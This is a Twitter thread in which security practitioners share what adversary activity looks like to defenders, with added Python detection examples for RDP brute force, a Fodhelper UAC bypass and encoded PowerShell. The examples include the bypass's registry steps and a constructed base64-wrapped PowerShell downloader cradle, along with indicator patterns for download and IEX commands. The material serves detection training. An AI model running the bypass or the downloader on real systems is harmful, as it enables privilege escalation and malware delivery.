New year, new Fiendish Dr. Noid, API-T
Blue Team peeps. I've got a favor to ask. Do you have any screenshots of adversary activity you could share with me? Redacted where necessary, of course. I'm trying to help a friend out with a presentation they're giving. The person who was supposed to help her is in the hospital
New year, new Fiendish Dr. Noid, API-T Feb 2
Replying to @_noid_
She's going to be talking about what adversary activity looks like. I've got plenty of screenshots from the attacker's perspective, but not much from the defender's side of things
New year, new Fiendish Dr. Noid, API-T Feb 2
Replying to @_noid_
Windows perspective is ideal as most of her students are operating in that environment
Matthew Toussain Feb 2
Replying to @_noid_
Note the timestamps associated with the attempted login events. Here we see a successful online password brute-forcing attack against RDP. Closer inspection of the log data would reveal the successfully authenticated account and remote IP address.
New year, new Fiendish Dr. Noid, API-T Feb 2
Replying to @0sm0s1z
Funny enough, I'm working on a list of logon event types to watch for. One of my usual indicators is attempts at Type 2 logon from service accounts or interactive logon from workstation to workstation. Outside of Help Desk/IT, I consider it anomalous behavior most places
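The two tweets above describe what the defender sees in the Windows Security log: a burst of 4625 (failed logon) events followed by a 4624 (successful logon) from the same remote IP, and logon types that are out of place for the account or host involved. The following is an added example, not code or data from either tweet author: detection logic run over a handful of constructed 4624/4625 records (the IPs, hostnames, account names, the `svc_` service-account convention and the `WS-`/`HD-` host prefixes are all assumptions made for the example). It first correlates the failed-logon burst with the type-10 (RDP) success to surface the account and IP that got in, then applies the two behavioural rules from the second tweet.

```python
"""Detection logic over constructed Windows Security log records.

The sample records are constructed for this example (not customer data) and
mirror the fields of event 4624 (successful logon) and 4625 (failed logon):
LogonType, TargetUserName, IpAddress, WorkstationName and the logging host.
Logon types used: 2 = Interactive (console), 3 = Network, 7 = Unlock,
10 = RemoteInteractive (RDP).
"""
from collections import defaultdict
from datetime import datetime, timedelta

T0 = datetime(2019, 2, 2, 3, 14, 0)  # constructed base time (03:14, i.e. off-hours)


def ev(offset_s, event_id, logon_type, user, ip, workstation, computer):
    """Build one constructed record; field names follow the 4624/4625 event XML."""
    return {
        "TimeCreated": T0 + timedelta(seconds=offset_s),
        "EventID": event_id,
        "LogonType": logon_type,
        "TargetUserName": user,
        "IpAddress": ip,
        "WorkstationName": workstation,  # source host as reported by the client
        "Computer": computer,            # host that logged the event
    }


EVENTS = [
    # 1) one external IP hammering RDP (type 10): about one failure per second
    *[ev(i, 4625, 10, user, "203.0.113.45", "-", "SRV-RDP01")
      for i, user in enumerate(["administrator"] * 4 + ["jdoe"] * 4)],
    ev(9, 4624, 10, "jdoe", "203.0.113.45", "-", "SRV-RDP01"),  # and then one success
    # 2) ordinary activity: a user unlocking her workstation, helpdesk RDP to a workstation
    ev(3600, 4624, 7, "asmith", "127.0.0.1", "WS-0042", "WS-0042"),
    ev(3700, 4624, 10, "it_helpdesk", "10.0.5.10", "HD-01", "WS-0042"),
    # 3) a service account logging on at the console of its server (type 2)
    ev(4000, 4624, 2, "svc_sql", "127.0.0.1", "SRV-SQL01", "SRV-SQL01"),
    # 4) a regular user's workstation making a network logon onto another workstation
    ev(4100, 4624, 3, "asmith", "10.0.7.22", "WS-0042", "WS-0107"),
]


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Flag a type-10 4624 preceded by >= threshold 4625s from the same IP inside
    `window`; the alert carries the account and remote IP that finally got in.
    `events` must be in time order."""
    failures = defaultdict(list)  # IpAddress -> timestamps of its 4625s
    alerts = []
    for e in events:
        if e["EventID"] == 4625:
            failures[e["IpAddress"]].append(e["TimeCreated"])
        elif e["EventID"] == 4624 and e["LogonType"] == 10:
            recent = [t for t in failures.get(e["IpAddress"], [])
                      if e["TimeCreated"] - t <= window]
            if len(recent) >= threshold:
                alerts.append({
                    "rule": "rdp_bruteforce_success",
                    "ip": e["IpAddress"],
                    "account": e["TargetUserName"],
                    "host": e["Computer"],
                    "failures": len(recent),
                    "first_failure": min(recent),
                    "success": e["TimeCreated"],
                })
    return alerts


SERVICE_ACCOUNTS = {"svc_sql", "svc_backup"}  # constructed naming convention
HELPDESK_HOSTS = {"HD-01", "HD-02"}           # hosts expected to reach workstations
WORKSTATION_PREFIX = "WS-"                    # constructed host-naming convention


def detect_anomalous_logon_types(events, service_accounts=SERVICE_ACCOUNTS,
                                 helpdesk_hosts=HELPDESK_HOSTS):
    """Two behavioural rules over successful logons (4624):
    - a service account logging on interactively (type 2);
    - one workstation logging on to another (type 3 network or type 10 RDP)
      from anything other than a helpdesk host."""
    alerts = []
    for e in events:
        if e["EventID"] != 4624:
            continue
        src, dst = e["WorkstationName"], e["Computer"]
        if e["LogonType"] == 2 and e["TargetUserName"] in service_accounts:
            alerts.append({"rule": "service_account_interactive", "host": dst,
                           "account": e["TargetUserName"], "time": e["TimeCreated"]})
        if (e["LogonType"] in (3, 10) and src.startswith(WORKSTATION_PREFIX)
                and dst.startswith(WORKSTATION_PREFIX) and src != dst
                and src not in helpdesk_hosts):
            alerts.append({"rule": "workstation_to_workstation", "source": src,
                           "host": dst, "account": e["TargetUserName"],
                           "logon_type": e["LogonType"], "time": e["TimeCreated"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(EVENTS) + detect_anomalous_logon_types(EVENTS):
        print(alert)
```

On the sample data this yields one `rdp_bruteforce_success` alert naming `jdoe` and `203.0.113.45` (eight failures in nine seconds before the success), one `service_account_interactive` alert for `svc_sql`, and one `workstation_to_workstation` alert for `WS-0042` reaching `WS-0107`; the unlock and the helpdesk RDP session produce nothing. The threshold and window are tuning knobs: RDP with NLA enabled often logs the failures as type 3 rather than type 10, which is why the rule counts every 4625 from the IP rather than only type-10 failures.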
Jarno Niemela Feb 3
Replying to @_noid_
Here is what a Windows 10 Fodhelper UAC bypass looks like. The payload tries to launch multiple Meterpreter stagers and then, when it succeeds, does the UAC bypass. The data is from my test environment, since I obviously can't share customer data
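For readers who do not have the screenshot in front of them, here is what the Fodhelper bypass leaves behind and how to catch it. This is an added example, not the tweet author's data or tooling: constructed Sysmon-style records (Event 13, registry value set; Event 1, process create) for a single hypothetical host, with the user SID, hostnames, paths and payload name all made up for the example. The technique itself is well documented: fodhelper.exe auto-elevates without a UAC prompt and resolves the `ms-settings` protocol handler through `HKCU\Software\Classes`, so a medium-integrity process that writes that handler gets its command run at High integrity.

```python
"""Fodhelper UAC bypass, defender's view: detection over constructed Sysmon records.

fodhelper.exe auto-elevates without a UAC prompt and opens the ms-settings:
protocol handler; because HKCU\Software\Classes is consulted before HKLM, a
medium-integrity process can register its own handler and have fodhelper launch
it as High integrity. The records below are constructed for this example (not
from the tweet author's environment) and mirror Sysmon Event 13 (registry value
set) and Event 1 (process create).
"""
import re
from datetime import datetime, timedelta

SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"  # constructed user SID
T0 = datetime(2019, 2, 3, 10, 0, 0)                       # constructed base time
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FODHELPER = r"C:\Windows\System32\fodhelper.exe"

# Sysmon reports HKCU keys as HKU\<SID>\...; accept both spellings, case-insensitively.
MS_SETTINGS_CMD = re.compile(
    r"^(?:HKCU|HKU\\S-1-5-21-[\d-]+)\\Software\\Classes\\ms-settings\\Shell\\Open\\command(?:\\|$)",
    re.IGNORECASE,
)


def hkcu(path):
    """Render a per-user key the way Sysmon logs it."""
    return "HKU\\" + SID + "\\" + path


def reg_set(offset_s, image, target, details, host="WS-0042"):
    """Constructed Sysmon Event 13 (RegistryEvent, value set)."""
    return {"EventID": 13, "TimeCreated": T0 + timedelta(seconds=offset_s), "Computer": host,
            "Image": image, "TargetObject": target, "Details": details}


def proc_create(offset_s, image, parent, integrity, cmdline, host="WS-0042"):
    """Constructed Sysmon Event 1 (ProcessCreate)."""
    return {"EventID": 1, "TimeCreated": T0 + timedelta(seconds=offset_s), "Computer": host,
            "Image": image, "ParentImage": parent, "IntegrityLevel": integrity,
            "CommandLine": cmdline}


PAYLOAD_CMD = r"cmd.exe /c start C:\Users\alice\AppData\Local\Temp\stage.exe"  # constructed

EVENTS = [
    # benign: Explorer toggling a view setting in the same user hive
    reg_set(0, r"C:\Windows\explorer.exe",
            hkcu(r"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"),
            "DWORD (0x00000001)"),
    # the bypass: register a handler for ms-settings:, then start fodhelper.exe
    reg_set(60, POWERSHELL, hkcu(r"Software\Classes\ms-settings\Shell\Open\command\DelegateExecute"),
            "(Empty)"),
    reg_set(60, POWERSHELL, hkcu(r"Software\Classes\ms-settings\Shell\Open\command\(Default)"),
            PAYLOAD_CMD),
    proc_create(61, FODHELPER, POWERSHELL, "High", "fodhelper.exe"),
    proc_create(61, r"C:\Windows\System32\cmd.exe", FODHELPER, "High", PAYLOAD_CMD),
]


def detect_ms_settings_handler_set(events):
    """Event 13 under the ms-settings command key. That key does not exist in a
    normal user hive, so any process creating or setting it is suspicious."""
    return [{"rule": "ms_settings_handler_set", "host": e["Computer"], "time": e["TimeCreated"],
             "image": e["Image"], "value": e["TargetObject"].rsplit("\\", 1)[-1],
             "details": e["Details"]}
            for e in events
            if e["EventID"] == 13 and MS_SETTINGS_CMD.match(e["TargetObject"])]


def detect_fodhelper_children(events):
    """Event 1 whose parent is fodhelper.exe: it has no business spawning a shell,
    and a High-integrity child is the elevated payload."""
    return [{"rule": "fodhelper_child", "host": e["Computer"], "time": e["TimeCreated"],
             "image": e["Image"], "integrity": e["IntegrityLevel"],
             "command_line": e["CommandLine"]}
            for e in events
            if e["EventID"] == 1 and e["ParentImage"].lower().endswith("\\fodhelper.exe")]


def detect_fodhelper_uac_bypass(events, window=timedelta(minutes=2)):
    """Correlate the two signals: handler key written on a host, then a fodhelper
    child on the same host within `window`. Either one alone already merits a look."""
    writes = detect_ms_settings_handler_set(events)
    alerts = []
    for child in detect_fodhelper_children(events):
        prior = [w for w in writes if w["host"] == child["host"]
                 and timedelta(0) <= child["time"] - w["time"] <= window]
        if prior:
            alerts.append({"rule": "fodhelper_uac_bypass", "host": child["host"],
                           "writer": prior[0]["image"], "registry_writes": len(prior),
                           "payload": child["command_line"], "integrity": child["integrity"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_fodhelper_uac_bypass(EVENTS):
        print(alert)
```

Against the sample records the registry rule fires twice (`DelegateExecute` and `(Default)`), the parent-process rule fires once for the High-integrity `cmd.exe`, and the correlation rule produces a single `fodhelper_uac_bypass` alert naming powershell.exe as the writer and the payload command line. Sysmon only logs Event 13 for keys your configuration includes, so the registry half of this needs a rule covering `Software\Classes\ms-settings` in the Sysmon config.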
New year, new Fiendish Dr. Noid, API-T Feb 3
Replying to @jarnomn
This would pair well with the screenshots I generated of PowerShell obfuscated payloads. Thanks
Digital Feb 2
Replying to @_noid_
Does Emotet being executed on a user's machine count? This has actually become an interview question (showing the PowerShell encoded command) to see how an analyst would figure out what's happening (basically asking that they understand they need to decode a base64 hash).
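The interview question above hinges on one detail that trips people up: `powershell -EncodedCommand` takes base64 of the script's UTF-16LE bytes, not UTF-8, and the decoded script frequently hides another base64 layer behind `[Convert]::FromBase64String`. The following is an added example, not from the tweet author and not a real Emotet sample: the command line is constructed in the code from plaintext (a two-layer downloader shape pointed at the reserved `example.invalid` domain), then decoded layer by layer and scanned for the indicators an analyst would pull out. The indicator patterns and the `-e`/`-enc` spelling list are the author of this example's choices, not anything from the tweet.

```python
"""Decoding a `powershell -EncodedCommand` launch and pulling indicators out of it.

The sample command line is constructed for this example (it is NOT a real Emotet
payload): an outer -Enc blob wrapping an IEX of a nested FromBase64String blob
whose plaintext is a downloader pointed at a reserved .invalid domain. It is
built from plaintext below so nothing in this file is an opaque blob.
"""
import base64
import re

# constructed plaintext of the innermost layer
DOWNLOADER = (
    "$w=New-Object System.Net.WebClient;"
    "$u='http://example.invalid/wp-content/AbC1/';"
    "$p=$env:TEMP+'\\8834.exe';"
    "try{$w.DownloadFile($u,$p);Start-Process $p}catch{}"
)
# constructed middle layer: the downloader hidden behind a second base64 layer
INNER = ("IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
         + base64.b64encode(DOWNLOADER.encode("utf-8")).decode("ascii") + "')))")


def encode_command(script):
    """What -EncodedCommand expects: base64 of the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_CMDLINE = ("powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc "
                  + encode_command(INNER))

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings commonly seen on the wire.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)")
NESTED_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decode_encoded_command(cmdline):
    """Return the script carried by -Enc, or None if the command line has none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))  # tolerate stripped padding
    return raw.decode("utf-16-le")  # the step people get wrong: UTF-16LE, not UTF-8


# group-free patterns, so findall() returns the matched text itself
INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer"),
    "invoke_expression": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "exec_policy_bypass": re.compile(r"(?i)-ex(?:ec|ecutionpolicy)?\s+bypass"),
    "url": re.compile(r"(?i)https?://[^\s'\"]+"),
}


def analyze(cmdline, max_layers=10):
    """Peel the outer -Enc layer, then every FromBase64String('...') blob found in
    any decoded layer, and run the indicator patterns over all layers together."""
    layers = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        layers.append(decoded)
    i = 1
    while i < len(layers) and len(layers) < max_layers:
        for blob in NESTED_B64.findall(layers[i]):
            try:
                layers.append(base64.b64decode(blob).decode("utf-8"))
            except (ValueError, UnicodeDecodeError):
                pass  # binary or compressed payload: not text, nothing more to peel here
        i += 1
    text = "\n".join(layers)
    hits = {name: sorted(set(rx.findall(text))) for name, rx in INDICATORS.items()}
    return {"layers": layers, "indicators": {k: v for k, v in hits.items() if v}}


if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    for n, layer in enumerate(result["layers"]):
        print(f"--- layer {n} ---\n{layer}")
    print(result["indicators"])
```

Running it prints three layers (the raw command line, the `IEX` wrapper, the downloader) and the indicators: a download cradle (`Net.WebClient`, `DownloadFile`), `IEX`, the hidden window and execution-policy bypass switches, and the URL. Real samples often swap the inner `UTF8.GetString` for a `DeflateStream`/`GZipStream` wrapper, in which case the nested blob decodes to bytes rather than text; the `except` branch above is where a decompression step would go.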
New year, new Fiendish Dr. Noid, API-T Feb 2
Replying to @0xDigital
That's a good one. Funny enough I was just digging through some of my encoded payloads looking for a good "If you see this, shit's happening" example
Adam ♿ 🐧 Feb 3
Replying to @_noid_
Does a home user count?
Ryan Feb 3
Replying to @_noid_ @hacks4pancakes
Random writeup from an old CTF. Not my writeup, so I can't grant permission if that's a factor